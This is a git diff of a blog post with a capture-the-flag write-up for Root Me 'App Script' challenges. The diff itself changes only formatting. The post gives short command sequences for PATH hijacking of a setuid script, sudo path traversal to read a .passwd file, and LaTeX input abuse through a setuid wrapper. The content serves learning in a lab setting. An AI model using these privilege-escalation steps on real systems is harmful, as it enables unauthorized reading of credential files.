--- a/_posts/ctf/rootme/app-script/2022-01-25-very_easy.md
+++ b/_posts/ctf/rootme/app-script/2022-01-25-very_easy.md
@@ -1,14 +1,13 @@
 ---
 layout: post
 title: 'Root Me | App Script - Very Easy'
-date: 2022-01-25
 permalink: /rootme/app-script/very-easy/
 ---
 
-# [](#header-4)Bash - System 1
+# Bash - System 1
 We need to copy cat into our folder, then change the name to "ls" and change the path to that folder.
 Now the script will read it as cat.
-{% highlight plain %}
+{% highlight bash %}
 > mkdir /tmp/zeropio
 > cp /bin/cat /tmp/zeropio
 > mv /tmp/zeropio/cat /tmp/zeropio/ls
@@ -16,16 +15,16 @@ Now the script will read it as cat.
 > ./ch11
 {% endhighlight %}
 
-# [](#header-4)Sudo - weak configuration
+# Sudo - weak configuration
 We need to see all the sudo options (with -l). Then we can see we need to use the cracked user, who can only do a cat to ./notes/ .
-{% highlight plain %}
+{% highlight bash %}
 > sudo -l
 > sudo -u app-script-ch1-cracked cat /challenge/app-script/ch1/notes/../ch1cracked/.passwd
 {% endhighlight %}
 
-# [](#header-4)Bash - System 2
+# Bash - System 2
 As we did in the first, we need to use nano instead of cat because the script have the options -al.
-{% highlight plain %}
+{% highlight bash %}
 > mkdir /tmp/zeropio
 > cp /bin/nano /tmp/zeropio
 > mv /tmp/zeropio/nano /tmp/zeropio/ls
@@ -33,9 +32,9 @@ As we did in the first, we need to use nano instead of cat because the script ha
 > ./ch12
 {% endhighlight %}
 
-# [](#header-4)LaTex Input
+# LaTex Input
 We will create a **main.tex** file with the following content:
-{% highlight plain %}
+{% highlight bash %}
 \documentclass{article}
 \usepackage{verbatim}
 
@@ -45,11 +44,11 @@ We will create a **main.tex** file with the following content:
 {% endhighlight %}
 
 We will generate a **main.pdf** file:
-{% highlight plain %}
+{% highlight bash %}
 > ./setuid-wrapper /tmp/main.tex
 {% endhighlight %}
 
  Then we will just get the pdf:
-{% highlight plain %}
+{% highlight bash %}
  > scp -P 2222 app-script-ch23@challenge02.root-me.org:/tmp/tmp.pIzF7UG6do/main.pdf .
  {% endhighlight %}
